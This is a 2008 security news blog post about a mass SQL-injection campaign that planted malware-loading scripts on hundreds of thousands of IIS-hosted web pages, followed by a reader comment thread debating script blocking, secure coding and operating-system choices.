Network News

X My Profile
View More Activity

Hundreds of Thousands of Microsoft Web Servers Hacked

Hundreds of thousands of Web sites - including several at the United Nations and in the U.K. government -- have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors' machines.

The attackers appear to be breaking into the sites with the help of a security vulnerability in Microsoft's Internet Information Services (IIS) Web servers. In an alert issued last week, Microsoft said it was investigating reports of an unpatched flaw in IIS servers, but at the time it noted that it wasn't aware of anyone trying to exploit that particular weakness.

On Thursday, Spanish anti-virus vendor Panda Security said that it had alerted Microsoft that a flaw IIS was the cause of all the break-ins. When I asked Microsoft whether they'd heard from Panda or if the hundreds of thousands of sites were hacked from a patched or unpatched flaw in IIS, a spokesman for the company didn't offer much more information.

"Microsoft is currently aware of and is receiving reports regarding public claims of attacks on IIS Web servers," said Bill Sisk, a security response manager at Microsoft, in a statement e-mailed to Security Fix. "While we have not be [sic] contacted directly regarding these reports, we will continue to monitor all reports either publically [sic] shared or responsibly disclosed and investigate once sufficient details are provided. We have not yet determined whether or not these reports are related to Microsoft Security Advisory (951306) released last week."

According to Finnish anti-virus maker F-Secure, the number of hacked Web pages serving up malicious software from this attack may be closer to half a million.

Dancho Danchev, an independent security analyst, has a decent write-up on signs that Web site owners can look for to tell whether their site has been hit by this attack. Danchev said all of the hacked sites appear to have Javascript coding adding to their page source that silently pulls down malware from a few domains in China, namely nihaorr1.com, and haoliuliang.net.

Needless to say, if you run a Google search for these sites you will find tens of thousands that contain the script that redirects any visitors to these malicious sites. I would strongly urge people to steer clear of those sites: I mention them here so that Web site owners can more easily search the HTML code in their pages for these domains.

There are indications that this attack is coming in waves, with the bad guys swapping in new malicious downloader sites every few days. According to posts on an IIS user forum, Web site administrators first saw signs of this attack on April 17, the day before Microsoft issued its initial advisory on the IIS vulnerability.

If you run your site with IIS, please take a moment to consider applying the workarounds in the Microsoft advisory for your version of IIS. Also, that IIS.net post I mentioned earlier has some great tips to help administrators lock down their systems.

These types of attacks that infiltrate legitimate, trusted Web sites are precisely the reason I so often recommend Firefox over Internet Explorer. There is a great add-on for Firefox called "noscript," which blocks these kinds of Javascript exploits from running automatically if a user happens to visit a hacked site. Currently, there is no such protection for IE users, and disallowing Javascript entirely isn't really an option on today's World Wide Web. True, you can fiddle with multiple settings in IE to add certain sites to your "Trusted Zone," but that option has never struck me as very practical or scalable.

Update, April 29, 11:28 a.m. ET: In a post to one of its blogs, Microsoft says this attack was not the fault of a flaw in IIS: "..our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are in no way related to Microsoft Security Advisory (951306). The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application's database. To protect against SQL injection attacks the developer of the Web site or application must use industry best practices outlined here. Our counterparts over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations."

Shadowserver.org has a nice writeup with a great deal more information about the mechanics behind this attack, as does the SANS Internet Storm Center.

By Brian Krebs  |  April 25, 2008; 8:00 AM ET
Categories:  Fraud , From the Bunker , Latest Warnings , Safety Tips  
Save & Share:  Send E-mail   Facebook   Twitter   Digg   Yahoo Buzz   Del.icio.us   StumbleUpon   Technorati   Google Buzz   Previous: Hannaford's Breach Tests Limits of Security Controls
Next: Do You Foxit? Then Patch It!

Comments

The way the infection is spreading across web servers is fairly simple, and it does not involve any particular Microsoft IIS vulnerability.
These attacks are launched by an automated tool using Google to find SQL injection vulnerable sites and exploiting them.
By default this tool searches for Microsoft ASP pages (an IIS specific web development technology) and injects a Microsoft SQL Server specific payload: these defaults, maybe, have generated the false perception that an IIS vulnerability is involved, while the infection is just leveraging trivial coding errors made by the web developers.
The U.N. case is emblematic, since the site bug is the very same I reported last year, and had been previously used to perform the famous "hacktivist" defacement. Nonetheless, it's still unpatched.
More details here: http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-you-so/

Posted by: Giorgio Maone | April 25, 2008 9:41 AM | Report abuse

Yeah what he said ^^

Posted by: SyncRait | April 25, 2008 9:46 AM | Report abuse

it would be interesting if the person handling public communication with you (and, i would assume, other folks outside of microsoft) could actually spell things correctly...

Posted by: IMGoph | April 25, 2008 10:16 AM | Report abuse

Do what I did - switch to Linux - for increased security. Ubuntu Linux 8.04 (www.ubuntu.com) just came out yesterday, April 24, 2008. Ubuntu Linux can live nicely on a Windows machine if you are not ready to switch entirely to a new operating system.

Posted by: Delafield | April 25, 2008 11:11 AM | Report abuse

Although switching to Linux is an option, it isn't necessary to go that far. Just run Apache 2 on your Windows server. If this is, as the first poster suggests, an SQL injection attack, then the web code needs to be tightened up regardless of the OS or webserver being used. The old adage of never trusting user input needs to be applied to these sites.

Posted by: BP | April 25, 2008 11:26 AM | Report abuse

as if sql injection attacks can be prevented by switching to linux or apache. this is a programming error by the website developer, not a defect in the OS or webserver. do your homework before you go running your mouths...

Posted by: Ben | April 25, 2008 12:38 PM | Report abuse

Or as SANS points out,

"The next time you read something about "OH NOEZ THE EXPLOIT IS TAKING OVER TEH WORLD. OMG LOL!!11". Try not and panic, it's probably not as big as it's claimed to be."

One thing to keep in mind about compromised websites
http://isc.sans.org/diary.html?storyid=4334

Posted by: TJ | April 25, 2008 1:00 PM | Report abuse

You said using "Trusted Zones" isn't practical? How is not? How is using an add-on more practical than using a built in feature?

Posted by: Practical | April 25, 2008 1:01 PM | Report abuse

To backup what giorgio said, the company i work for was hit by this and our investigations point to an SQL injection attack. Incidents like this just highlight the need for bullet proof input validation. Anyone wanting more info could check out :- http://forums.iis.net/t/1148917.aspx?PageIndex=1

Posted by: Steve | April 25, 2008 1:08 PM | Report abuse

"...it's probably not as big as it's claimed to be."
Unless you're one of the victims.

"...bullet proof input validation."
'Picked the wrong planet for that.

.

Posted by: J. Warren | April 25, 2008 1:14 PM | Report abuse

Quote: "You said using "Trusted Zones" isn't practical? How is not? How is using an add-on more practical than using a built in feature?"
--------
Have you even used it? NoScript uses fewer mouseclicks, has on the fly configurability, and tells you what a site is trying to execute and when. Just reading this blog at washingtonpost.com, my browser tries to reference googlesyndication.com, revsci.net, and doubleclick.net, and this is a security blog.

It's MY browser, and the only page I consented to load was washingtonpost.com. Wait, what? When did that become unreasonable?

Offsite scripting is out of control, and I'm no MS basher but they are way behind the curve in protection of consumer privacy at this point. IE ships vulnerable out of the box with a Medium-High security setting that allows people to be prompted with tricky ActiveX installers without even knowing what they are for, and it executes offsite javascript by default. Their goofy zones are too generalized and too hidden in 2008. People just avoid using HIGH security as a result.

Firefox should ship with NoScript installed and activated, IE should ship with NoScript like functionality, and if a user can't figure out why their browser won't work, then that's the perfect acid test that tells us they are too irresponsible to be on today's extremely dangerous web. Gone are the days when you could just disable javascript and have your important sites work, now everything uses it, and releasing a browser without granular javascript controls is just plain irresponsible.

Connecting a browser to the internet ought to be treated like driving a car--people should need to prove a baseline of competence because their actions impact the quality of life for others.

Posted by: Eponymous | April 25, 2008 1:57 PM | Report abuse

@Practical asked: "You said using "Trusted Zones" isn't practical? How is not? How is using an add-on more practical than using a built in feature?" Step one is to disable javascript for all sites; this is a one-time action on all platforms. Then you need to start adding the sites that you trust to a whitelist.

In IE, you click on "Tools", "Internet Options", the "Security" tab, the "Tusted Sites" icon, the "Sites" button, and finally type in the DNS name of the site. If you were clever, you copied the name from the address bar before starting, otherwise you need to type in the entire thing by hand. It takes about ten seconds to perform all of these steps.

"Noscript", on the other hand, adds an icon to the browser status bar. Clicking on the icon pops up a menu that lists every DNS address mentioned on the current page. You just point your mouse to "blog.washingtonpost.com" and you're done in under a second. Since scripts from, say, nihaorr1.com aren't allowed to run, you're safe!

Also, "blog.washingtonpost.com" runs scripts hosted by "www.washingtonpost.com" and "media.washingtonpost.com", so you need to add them to the whitelist as well. In Noscript, you see those names in the popup menu and can select them easily. In IE, you need to "View source" and look for SCRIPT tags, which takes much longer and is prone to errors.

Posted by: Sam D. | April 25, 2008 2:00 PM | Report abuse

Eponymus, take a pill. Everyone else, study. The web should make use of emerging technologies as well as mature technologies, such as client-side scripting. period. They don't call it web stagnant state, they call it web development. I want a rich user experience and blocking client side scripting for fear of whatever your fears are is silly. Don't put information you don't want available to people on a computer hooked up to the web. The likely reason for what happened with this sudden onset of hacks is scores of so-called professionals writing awful code. It's way easier to find a list of servers with injection vulnerabilities running wild than to forcibly exploit a weakness in the inner workings of IIS. There are a bunch of places in the process where this can be avoided beforehand. So my opinion stands that, if you are a professional, act accordingly. Go to great lengths to write better code, understand how the systems work, and follow best practices. If you act accordingly, these issues are pretty easy to resolve if they do crop up.

Posted by: Wowzers | April 25, 2008 2:19 PM | Report abuse

Brian Krebs -- We've got conflicting information here about whether this is truly an IIS vuln or a more generic code injection. Can you confirm/clarify one way or another? Thanks.

Posted by: Tom | April 25, 2008 2:20 PM | Report abuse

Sam D. would you care to enumerate the steps required to install the Noscript extension? I bet its longer than the trusted sites installation.

Posted by: John S. | April 25, 2008 2:22 PM | Report abuse

John S: To install it, google "noscript", click on "NoScript :: Firefox Add-ons" then "Add to Firefox" then "Install".

The Google search page is the default home page in Firefox, so the user does not have to navigate there themselves. If you wanted to give more direct instructions, you could link to the addon page itself (https://addons.mozilla.org/en-US/firefox/addon/722), and from there the user only needs to click twice to install NoScript. That's fewer clicks than are required to get to the Trusted Sites list in IE.

This is a fair comparison, since despite Trusted Sites being installed by default, you would still have to tell a new user that the feature exists and how to use it. It takes more work per-site to use Tusted Sites than it does to install and use NoScript for the first time.

Posted by: Douglas | April 25, 2008 3:27 PM | Report abuse

John S: click Tools / Addons, the addon dialog appears, click Get Addons, type "noscript" into the search box and it appears, click Install

Posted by: John C | April 25, 2008 3:42 PM | Report abuse

I aggree with J. Warren's assessment on bullet proof input validation ...

http://isc.sans.org/diary.html?storyid=3823

Posted by: CBW | April 25, 2008 4:20 PM | Report abuse

Go to CoreTrace.com they can solve problems like this.

Posted by: Anonymous | April 25, 2008 5:39 PM | Report abuse

Tom -- There is no doubt SQL is a vector here. The question I put to Microsoft about the IIS vulnerability came about from the Panda advisory, which said it had alerted Microsoft to a vulnerability in IIS that was being used in this attack.

It may well be that Panda (which still has not returned my messages, btw) is completely mistaken about any vulnerabilities in IIS contributing to this episode in any meaningful way. I put the question straight to Microsoft, whether they'd heard from Panda and whether this mass hack was at all related to a new IIS vuln or one that they issued an advisory about last week. Their answer, detailed in the blog entry above, was hardly definitive either way (their inclusion of the term "responsible disclosure" in answering my question may be noteworthy).

FWIW, below follows the text of the advisory Panda published yesterday:

------

"Panda Security advises webmasters to check their Web pages, due to a massive hacker attack

- A vulnerability in Internet Information Servers allows cyber crooks to inject SQL code to manipulate legitimate Web pages. As a result, visitors are redirected to a malicious website designed to install malware on computers

- According to PandaLabs, at least 282,000 Web pages of all types have been affected, and this number is increasing

- The attack is easily detected, as a very specific code string is inserted in the compromised page's source code

MADRID, April 24, 2008

PandaLabs has reported a vulnerability in Internet Information Server which is allowing a massive hacker attack. This attack currently affects 282,000 Web pages, and this number could increase drastically.

This security problem allows hackers to inject SQL code in all the pages hosted on a Web server. This code is designed to redirect all visitors at compromised pages to a malicious website which analyzes systems for vulnerabilities that could be used to download all types of threats.

The situation is exacerbated by the fact that most of the web pages affected show no suspicious signs whatsoever and many of them have numerous visitors.

How to detect if a web page has been manipulated

Panda Security advises all webmasters with pages hosted on Internet Information Server to check as soon as possible if their web pages have been affected. The procedure is simple, as it involves searching for a specific code string in the source code of the web page, associated to an IFRAME tag. This string is:

If detected, it should be immediately eliminated and those responsible for administering the server hosting the Web pages should be warned to enable them to implement the corresponding security measures.

Given the large number of Web pages affected, many users could have been infected by all types of malicious code, including new strains as yet unrecognized by security companies.

Posted by: Bk | April 25, 2008 5:42 PM | Report abuse

I am a security professional and though I ran with NoScript for awhile, I found it to require way too many clicks all the time and stopped. As stated above, pages on commercial (and often non-commercial) sites these days have a huge number of JavaScript calls to different off-domain servers (many often required for the site to even function properly), resulting in a billion requests for scripting access with every page you go to. I just found it to be too impractical and slow to browse with that on. I certainly don't think it's remotely reasonable for the average user.

The IE approach (if I recall it correctly) of either allowing no scripts to run (once you've set it up that way) on a site, or allowing all scripts to run, regardless of origin, is a more usable approach for the average user, though of course it doesn't help with the case of a legitimate site that's been compromised and is serving up some malicious offsite scripts along with its legitimate content, as in this case.

Posted by: Dan H. | April 25, 2008 5:53 PM | Report abuse

You can filter out the SQL injection strings with WebKnight, an open source ISAPI filter.

Posted by: Jilly | April 25, 2008 5:59 PM | Report abuse

@Tom, @Brian:
Some clarifications and advices at
http://hackademix.net/2008/04/26/mass-attack-faq/

@Dan:
IE's zones are far less usable than NoScript because they require a complex navigation sequence through modal dialogs for each site you want to allow, while NoScript's contextual menu is accessible with a single click.

Posted by: Giorgio Maone | April 25, 2008 7:03 PM | Report abuse

>>True, you can fiddle with multiple settings in IE to add certain sites to your "Trusted Zone," but that option has never struck me as very practical or scalable.

Don't knock it till you've tried it.
http://www.spywarewarrior.com/uiuc/btw/ie/ie-opts.htm#trusted

@ Eponymous:
>>Offsite scripting is out of control, and I'm no MS basher but they are way behind the curve in protection of consumer privacy at this point. IE ships vulnerable out of the box with a Medium-High security setting that allows people to be prompted with tricky ActiveX installers without even knowing what they are for, and it executes offsite javascript by default.

But IE7 on Vista runs in a "sandbox", so Windows Enthusiasts will claim it's all good. And -- so long as other browser users also get to run theirs in one -- they might turn out to be right.
http://sandboxie.com

>>Their goofy zones are too generalized and too hidden in 2008.

Actually, the idea of zones makes sense (NoScript creates the analogue of a Trusted Sites zone: a whitelist, if you will); IE's are just configured wrong by default (whereas "right" would be "deny all, then allow exceptions"). I agree about "too hidden", especially the My Computer zone.

@ Wowzers:
>>The web should make use of emerging technologies as well as mature technologies, such as client-side scripting. period.

Only if you can convince me that your site's scripts are trustworthy. Otherwise, your site can either stay in the (strengthened) Internet zone by default, or it can run its scripts in a "sandbox".

>>I want a rich user experience

The problem is, malware writers also want you to have a rich user experience; it's having one without enabling them that's the trick.

>>and blocking client side scripting for fear of whatever your fears are is silly.

Do you trust _everyone on the Internet_ to run script code in your browser? If so, why?

Posted by: Mark Odell | April 25, 2008 8:18 PM | Report abuse

@ Dan H.:
Doesn't NoScript have config options to just let you whitelist the sites you want to allow to run scripts, and never bug you about other sites you visit?
http://noscript.net/features#options

>>The IE approach (if I recall it correctly) of either allowing no scripts to run (once you've set it up that way) on a site, or allowing all scripts to run, regardless of origin, is a more usable approach for the average user,

....until his Windows instance becomes unusable &/or pwned due to all the malware installed from allowing all scripts to run.

@ Giorgio Maone:
>>IE's zones are far less usable than NoScript because they require a complex navigation sequence through modal dialogs for each site you want to allow,

....unless you install IE Power Tweaks (see my first link above).

(Giorgio, I expect to be able to configure NoScript to [1] run scripts on sites in a whitelist, [2] block scripts on all other sites not in that whitelist, and [3] otherwise _shut up_.)

Posted by: Mark Odell | April 25, 2008 8:58 PM | Report abuse

Please learn how to spell IIS.

Posted by: Jeffrey | April 25, 2008 11:41 PM | Report abuse

and of course the injection can by turned around and the same SQL used to cleanse the attack pretty simply - http://tinyurl.com/6g2a95

Posted by: nihaorr1-injection | April 26, 2008 12:12 AM | Report abuse

please use condom ...errr Firefox to navigate the internet

keep far away from Internet Explorer ...it is too dangerous

hope it helps

orlando

Posted by: orlando | April 26, 2008 12:43 AM | Report abuse

@Mark Odell, who wrote:
"I expect to be able to configure NoScript to [1] run scripts on sites in a whitelist, [2] block scripts on all other sites not in that whitelist, and [3] otherwise _shut up_."

Just uncheck "NoScript Options|Notifications|Show message about blocked scripts". You will still able to check current status with a glance to the status bar icon.

Posted by: Giorgio Maone | April 26, 2008 3:43 AM | Report abuse

Publically [sic]?

Leave off, this is perfectly decent english. "Publicly" is the fudge.

Posted by: Michael Houghton | April 26, 2008 6:16 AM | Report abuse

IE7 does *not* run in a sandbox by default, the coming IE8 does however.

Posted by: Alexander Kellett | April 26, 2008 8:37 AM | Report abuse

It basically comes down to development discipline. It's a risk on any system if your developers don't develop for security.

You need to validate all data, and use whitelisting where possible not blacklisting. If it's a phone number then don't allow anything but numbers. Even then, this particular attack is good at getting around common filters.

You need components to talk to eachother in ways that cannot execute the content. The way that so many sites work - building up database commands using the user input - is just wrong. Parametrised queries ensure that the data is preserved entirely as data.

Even once the data is safely in place, as long as it came from an untrusted source you must remember that it is untrusted data. Everywhere the data is used you must be aware. For example if displaying a user comment on a page you must either clean it up on entry using validation, or clean it up when you display it.

So, it's down to the developers who need to understand security. It's also down to development departments who need to ensure that the developers understand and ensure that time and budget is given for it.

Posted by: Richard | April 26, 2008 8:56 AM | Report abuse

My suggestion for safer surfing would be to run Giorgio Maone's NoScript on an updated version of a Firefox browser (fortunately, Signor Maone's latest version of the tool runs on both the stable (2.0.0.14) version of Firefox and the latest (3.0b5) beta version), and to check the websites therein displayed with tools like the McAfee SiteAdvisor and/or the Netcraft toolbar (alas, these latter do not (yet ?) support the Firefox betas). As a general rule, one need only allow the main site of the several that often appear on the NoScript menu without negatively influencing the functionality of the site ; thus, I am able to read Brian's excellent column, despite the fact I have only allowed one - washingtonpost.com - of the three sites displayed. This, however, is not always the case ; in order to run Youtube videos on my setup, for example, I must allow both youtube.com and ytimg.com....

Henri

Posted by: M Henri Day | April 26, 2008 11:25 AM | Report abuse

M Henri Day, no scripting at all is required to read or post to Security Fix. The Post in general requires it for a few of their stupider features (e.g. their so-called interactive guides and whatnot), but everything useful on the Post is accessible with Javascript disabled entirely.

Posted by: antibozo | April 26, 2008 12:47 PM | Report abuse

So, I installed NoScript w/ the most up-to-date FF release, and I am a very conservative web user. But if this exploit is hacking well-respected sites, such as major media and gov't sites, how do I know whether it's safe to allow a script from *any* site, even ones I use regularly?

Is it that it's always safe to allow the main url for the site you're choosing to look at, and you only have to look out for other odd URLs that show up on the same page?

If I browsed to one of the hacked pages, say the UN ones, right now, believing the UN to be a reliable site, what would the NoScript warnings say and how would I know to stay away?

Posted by: Advanced Amateur | April 26, 2008 1:03 PM | Report abuse

can we please have writers that have at least an iota of technical knowledge to write these articles. Half a million webpages does not amount to half a million web servers. one web server can serve thousands of webpages. Either the author is truly inept or it is done purposefully to make the article sound more sensational than it truly is

either ways, the article is on techmeme, so mission accomplished. truth is highly overrated anyways.

Posted by: mk | April 26, 2008 3:58 PM | Report abuse

@Advanced Amateur:
If you browse on one of the U.N. hacked pages, NoScript blocks the malicious script even if you allow(ed) the "un.org" domain to run scripts. You must explicitly allow "nihaorr1.com" in order to let the malicious script run. In every serious attack on a "trustworthy" web site seen so far, the malicious scripts are loaded from external and usually very suspect sites, because a short inclusion script or iframe tag is much easier to inject and keep stealthy than the whole payload, and it's much more convenient for the attacker, who can stay in control of the code after the injection.
Furthermore, Firefox 3 will prevent you from opening the page as soon as Google's "StopBadware" system is aware of the infection.

So, as a rule of thumb:
1) Never allow scripts from a domain you've never heard of, especially if it's not the main site of the page (the bold one in NoScript menus)
2) Don't allow scripts unless there's really something you need which apparently can not work otherwise
3) When you visit a web site for the first time and you find you need scripts to be allowed, check site reputation with siteadvisor.com, mywot.com or a similar service (WOT reputation score is gonna be integrated in NoScript soon, for increased convenience)

Posted by: Giorgio Maone | April 26, 2008 5:50 PM | Report abuse

HACKED BY CHINESE

Posted by: AM | April 26, 2008 8:39 PM | Report abuse

So, MSFT should be attending to this newest vulnerability any day now, right? Vista SP3? Maybe in Windows Se7en?

Why is this so hard? Why is network security such an issue? Why do Windows fans keep defending ten years of poorly-managed work?

Posted by: Moeskido | April 26, 2008 9:25 PM | Report abuse

An addendum for non-techies to this learned discussion. 'No-Script' is not listed as a recommended Add-On at the Mozilla website. As a non-techie I only install the recommended Add-Ons.

If any readers can add detail or are familiar with the reason(s) that Mozilla doesn't recommend 'No-Script' I'd love to hear/read about it!

Posted by: KFritz | April 26, 2008 10:14 PM | Report abuse

This reminded me of Little Bobby Tables:
http://xkcd.com/327/

Posted by: f4a | April 27, 2008 3:46 AM | Report abuse

this news is pure FUD because this attack does NOT use any vulnerabilities in any of those two applications Microsoft IIS webserver and Microsoft SQL Server:
http://www.f-secure.com/weblog/archives/00001427.html
"So far we've only seen websites using Microsoft IIS webserver and Microsoft SQL Server being hit. Do note that this attack doesn't use any vulnerabilities in any of those two applications"

Posted by: suc | April 27, 2008 4:09 AM | Report abuse

malicious javascript are not dangerous unless we have a flaw in the browsers, and this is not the case.
So this malicious javascript are just trying to download/run malicious files, but this not dangerous because the browser will prompt you in order to have a confirm.

Posted by: suc | April 27, 2008 4:16 AM | Report abuse

malicious javascripts are not dangerous unless we have a flaw in the browsers, and this is not the case.
What a malicious javascript can do is just trying to download/run malicious files, but this not dangerous because the browser will prompt you in order to have a confirm.

Posted by: suc | April 27, 2008 4:18 AM | Report abuse

@suc:
Malicious JavaScript can be dangerous even in an imaginary flawless browser, see http://noscript.net/faq#qa1_10

@KFritz:
Recommended add-ons are rotated every 3-4 weeks not to stagnate and be unfair to new add-ons.

BTW, NoScript *is currently* in the list of recommended add-ons:
https://addons.mozilla.org/en-US/firefox/recommended

Posted by: Giorgio Maone | April 27, 2008 6:14 AM | Report abuse

I am running IE7 ver. 7.0.6001.18000 on Vista Home Premium SP1.

Control Panel>Internet Options>Security Tab>Custom Level Button>Scroll to Scripting Section>Under Active Scripting click disable. Restart all instances of IE7.

No more scripts!

Now, why do web site owners, web site creators, and the folks who place all this active content in web pages not want you to do this?

Because it will block almost all their ads!

Go figure!

I do hope that MS takes note of the release of information about these attacks and uses it rights as a trademark holder to stop all sites who act in such a way from using any MS logo or trademarks in any commercial publications for profit. I would do it now.

BTW, this page loads in 1/10th the time with no ads! How nice!

Posted by: Master Guru | April 27, 2008 9:52 AM | Report abuse

It's essentially bad programming because of common practice of irresponsible programming with ASP/IIS. It's not the technology per se. Linux/PHP is much more secure, but unrelated to this on the surface. When malware gets auto-installed on unpatched poorly maintained PCs running Windows, personal data of the this attacked PC is stolen. That is where Linux prevents further damage. For other reasons too, Linux is better. But in this case, making your PC an unknowing partner to spreading many spyware and malware infections is easy on Windows and not on Linux.

Finally, the open source nature of Linux based programs means that you do not have to wait for Microsoft to accept, analyse and then patch the system. Linux and opensource code is watched daily, with "paranoid level security" by literally more than thousands of *experts*, not a hundred-strong security team already overburndened with flaws and inconsistencies. That's why Linux is beter in the overall picture, both for end users and for Linux programmers.

Posted by: samuel emmanuel | April 27, 2008 3:06 PM | Report abuse

This is a great time to buy a mac/

Posted by: Ken | April 27, 2008 3:17 PM | Report abuse

These comments got way off topic -- this is a server-side issue, not client-side. Using your fancy NoScript plugins to protect your browser are not going to fix the issues discussed in the article.

-posted from my stable and secure Mac

Posted by: coolfactor | April 27, 2008 5:10 PM | Report abuse

man, whew, thank god for Ubuntu Linux. i'd forgotten what an infection/hack was like.

Posted by: Neo | April 27, 2008 5:43 PM | Report abuse

Only idiots develop applications that are susceptible to SQL injection. I can't tell you how many "senior level developers" I have met that don't know what sql injection is. UK web developers, have you heard of using db parameters? sheesh

Posted by: MC | April 27, 2008 6:05 PM | Report abuse

WoW!!

Buy a Mac

Posted by: HotinPlaya | April 27, 2008 9:06 PM | Report abuse

It's scary how someone with such a limited and bigoted knowledge can write such tripe. Did you realise that in a recent hack competition featuring mac, pc and linux boxes the MAC WAS THE FIRST TO GET HACKED, AND IN 30 MINUTES! http://www.news.com/2100-7349_3-6178131.html.
If you want to know the truth about Mac, then learn from the guy who invented the personal computer (read pc, mac and commodore etc) http://www.commodore.ca/history/people/chuck_peddle/chuck_peddle.htm . Pay attention to his comments on Steve Jobs and Bill Gates near the end of the article.

Posted by: Marcus | April 27, 2008 9:47 PM | Report abuse

>thank god for Ubuntu Linux. i'd forgotten what an infection/hack was like.

Neo - I'll echo Marcus's comment -
"It's scary how someone with such a limited and bigoted knowledge can write such tripe."

Phishing sites loaded on otherwise legit sites run about 10:1 running on LAMP instead of IIS. Did you even read and understand any of the information in this article and comments?

Posted by: Moike | April 28, 2008 8:25 AM | Report abuse

"Only idiots develop applications that are..."

not everyone is as smart and knowledgeable as you...These folks are not idiots...ignorant yes, but not idiots. they look to folks like us to help them, not demean them.


Posted by: Tim | April 28, 2008 11:52 AM | Report abuse

Giorgio: well done, sir, thank you!

@ Master Guru:
>>Now, why do web site owners, web site creators, and the folks who place all this active content in web pages not want you to do this?

_Do_ the parties you cite not want us to do this? What evidence do you adduce for this sweeping generalization?

OTOH, we have the evidence of Microsoft's own words that _they_ don't want you to do this. For example:
"Reduced security settings can result in security risk, whereas increased security settings can reduce functionality."
http://support.microsoft.com/kb/174360

>>Because it will block almost all their ads!
>>
>>Go figure!

By your own reasoning, would that include Silverlight, or would it not?
http://www.innerexception.com/2008/04/where-is-silverlight-nag-install.html

Posted by: Mark Odell | April 28, 2008 2:14 PM | Report abuse

@ coolfactor:
>>Using your fancy NoScript plugins to protect your browser are not going to fix the issues discussed in the article.

It's not intended to; it's intended to limit collateral damage incurred by visitors to sites which _do_ have those issues.

>>-posted from my stable and secure Mac

....with its Safari instance freshly-patched, one hopes.
http://www.eweek.com/c/a/Security/Apple-Patches-MacBook-Air-Hijack-Flaw/

@ Marcus:
>>Did you realise that in a recent hack competition featuring mac, pc and linux boxes the MAC WAS THE FIRST TO GET HACKED, AND IN 30 MINUTES!

Did you realise that the Mac was hacked through _a Safari vuln_, involving (wait for it) JavaScript?

Did you realise that Apple have already patched this vuln? (see link above)

>>It's scary how someone with such a limited and bigoted knowledge can write such tripe.

I couldn't agree more.

Posted by: Mark Odell | April 28, 2008 2:49 PM | Report abuse

Any version of Linux is much safer to use as a desktop - next to no spyware, virus's etc

"Phishing sites loaded on otherwise legit sites run about 10:1 running on LAMP instead of IIS. Did you even read and understand any of the information in this article and comments?"

- All this says is that apache servers were used and the vulnerbility was with apache not linux - also Phishing worms,etc still only infect Windows machines - even if they are hosted on a Linux server .

I. E - Linux desktops are the safest to use.

Only a moran would use Windows....

Posted by: yossarianuk | April 29, 2008 5:04 AM | Report abuse

>All this says is that apache servers were used and the vulnerbility was with apache not linux -

If you'll read this article and comments, you'll realize that Apache itself is not at fault for SQL injections. Both platforms are susceptible to SQL injections.

> also Phishing worms,etc still only infect Windows machines - even if they are hosted on a Linux server .

A Linux desktop is just as susceptible to Phishing sites as any other machine.

> Only a moran would use Windows....
Hee hee - I won't touch that one...

Posted by: Moike | April 29, 2008 2:08 PM | Report abuse

This article is misleading. How is Microsoft IIS responsible for SQL injection attacks? It isn't, the programmers who created the poorly written web applications are. Apache/PHP is just as vulnerable to SQL injection.

Posted by: Ryan B | April 29, 2008 6:32 PM | Report abuse

Posted by: Ajay | May 1, 2008 12:05 AM | Report abuse

@BP: I was suggesting switching to Linux on the desktop above to avoid being victimized on the user's end.

You said: "as if sql injection attacks can be prevented by switching to linux or apache."

So, I wasn't (maybe other commenters were) talking about the server side.

Posted by: Delafield | May 2, 2008 1:18 PM | Report abuse

In the past two weeks I have recieved a vast number of "Returned Messages" noted as error,these on fact That I had NEVER SENT ! over period of 36 hours I got 166
returned message in this manner !.
Even now I am getting five or six daily that are NOT of my origin !!.

Posted by: Eric.Frith | May 11, 2008 3:02 AM | Report abuse

hey there are prople out there that try to ruin everything, for everyone. thats not good what is it in ther mind that they want?
maybe they just think with there brain in there anal gland

Posted by: robbi | May 11, 2008 2:13 PM | Report abuse

hey there are prople out there that try to ruin everything, for everyone. thats not good what is it in ther mind that they want?
maybe they just think with there brain in there anal gland

Posted by: robbi | May 11, 2008 2:22 PM | Report abuse

The comments to this entry are closed.

 
 
RSS Feed
Subscribe to The Post

© 2010 The Washington Post Company